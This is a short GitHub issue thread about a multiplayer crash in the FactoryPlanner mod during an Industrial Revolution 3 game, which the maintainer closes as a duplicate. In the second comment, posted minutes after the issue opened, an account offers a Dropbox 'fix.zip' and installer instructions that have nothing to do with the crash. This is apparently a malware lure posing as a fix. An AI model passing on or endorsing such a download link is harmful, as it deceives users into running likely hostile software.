### ISSUE TITLE
Experienced a crash in Industrial Revolution 3

### ISSUE THREAD

**Issue by scottmsul** [ClaudeMetz/FactoryPlanner#325] opened 2024-08-26 00:57 UTC
This was a multiplayer game with three people. My friend was adding the recipe for coke and silica. He says he right-clicked coke and it crashed when mousing over recipes in the recipe dialog. When we restarted the game he was able to do this without crashing. Screenshot of the crash dialog is shown below. We were using Factory Planner version 1.1.78.

![image](https://github.com/user-attachments/assets/d3b5af3c-94f7-4796-b9eb-918ab7142b64)

**Comment by Diganta-18** [comment] 2024-08-26 00:59
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by ClaudeMetz** [comment] 2024-08-26 16:23
This crash looks like a multiplayer latency issue which is unfortunately very hard to guard against besides just adding delays in the right places. If you know what those are. I'll have a try with this one sometime but yeah, kinda hard.

Well, or I could add some checks to absolutely everything to make sure things are still valid, but that'd be massive bloat, so I'm not sure I like that approach.

**Comment by ClaudeMetz** [comment] 2024-10-13 19:17
Turns out this is a duplicate of #219, which is a common issue.

**Closed by ClaudeMetz** 2024-10-13 19:17 UTC
